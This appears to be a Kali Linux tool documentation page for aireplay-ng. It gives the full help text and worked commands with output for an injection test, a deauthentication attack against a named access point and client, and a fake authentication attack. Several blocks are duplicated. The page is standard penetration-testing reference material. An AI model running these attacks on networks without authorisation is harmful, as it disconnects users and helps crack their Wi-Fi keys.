Aireplay-ng Description
Aireplay-ng is included in the aircrack-ng package and is used to inject wireless frames. Its main role is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys. Aireplay-ng has many attacks that can deauthenticate wireless clients for the purpose of capturing WPA handshake data, fake authentications, interactive packet replay, hand-crafted ARP request injection, and ARP-request reinjection.
Source: Aireplay-ng Wiki
Aireplay-ng Homepage | Kali aircrack-ng Repo
- Author: Thomas d’Otreppe, Original work: Christophe Devine
- License: GPLv2
aireplay-ng – inject packets into a wireless network to generate traffic
root@kali:~# aireplay-ng --help
Aireplay-ng 1.5.2 - (C) 2006-2018 Thomas d'Otreppe
https://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
Miscellaneous options:
-R : disable /dev/rtc usage
--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
--help : Displays this usage screen
Aireplay-ng 1.5.2 - (C) 2006-2018 Thomas d'Otreppe
https://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
Miscellaneous options:
-R : disable /dev/rtc usage
--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
--help : Displays this usage screen
aireplay-ng Usage Examples
Injection Test
Run the injection test (-9) via the monitor mode interface wlan0mon.
root@kali:~# aireplay-ng -9 wlan0mon
22:55:44 Trying broadcast probe requests...
22:55:44 Injection is working!
22:55:46 Found 4 APs
22:55:46 Trying directed probe requests...
22:55:46 24:FB:95:FD:3D:7F - channel: 6 - 'America'
22:55:52 30/30: 100%
22:55:52 34:6D:A0:CD:45:10 - channel: 6 - 'ATT2b8i4UD'
22:55:58 27/30: 90%
22:55:58 50:64:3D:2A:F7:A0 - channel: 6 - 'FBI surveillance van'
22:56:04 12/30: 40%
22:56:04 16:6E:EF:29:67:46 - channel: 6 - 'dd-wrt_vap'
22:56:10 1/30: 3%
22:55:44 Trying broadcast probe requests...
22:55:44 Injection is working!
22:55:46 Found 4 APs
22:55:46 Trying directed probe requests...
22:55:46 24:FB:95:FD:3D:7F - channel: 6 - 'America'
22:55:52 30/30: 100%
22:55:52 34:6D:A0:CD:45:10 - channel: 6 - 'ATT2b8i4UD'
22:55:58 27/30: 90%
22:55:58 50:64:3D:2A:F7:A0 - channel: 6 - 'FBI surveillance van'
22:56:04 12/30: 40%
22:56:04 16:6E:EF:29:67:46 - channel: 6 - 'dd-wrt_vap'
22:56:10 1/30: 3%
Deauthentication Attack
Run the deauthentication attack (-0), sending 5 packets to the wireless access point (-a 8C:7F:3B:7E:81:B6) to deauthenticate a wireless client (-c 00:08:22:B9:41:A1) via the monitor mode interface wlan0mon.
root@kali:~# aireplay-ng -0 5 -a 8C:7F:3B:7E:81:B6 -c 00:08:22:B9:41:A1 wlan0mon
12:41:56 Waiting for beacon frame (BSSID: 8C:7F:3B:7E:81:B6) on channel 6
12:41:57 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:59 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:42:00 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:56 Waiting for beacon frame (BSSID: 8C:7F:3B:7E:81:B6) on channel 6
12:41:57 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:59 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:42:00 Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
Fake Authentication
Run the fake authentication attack and re-authenticate every 6000 seconds (-1 6000) against the access point (-a F0:F2:49:82:DF:3B) with the given ESSID (-e FBI-Van-24), specifying our mac address (-h 3c:46:d8:4e:ef:aa), using monitor mode interface wlan0mon.
root@kali:~# aireplay-ng -1 6000 -e FBI-Van-24 -a F0:F2:49:82:DF:3B -h 3c:46:d8:4e:ef:aa wlan0mon
12:49:59 Waiting for beacon frame (BSSID: F0:F2:49:82:DF:3B) on channel 6
12:50:06 Sending Authentication Request (Open System)
12:49:59 Waiting for beacon frame (BSSID: F0:F2:49:82:DF:3B) on channel 6
12:50:06 Sending Authentication Request (Open System)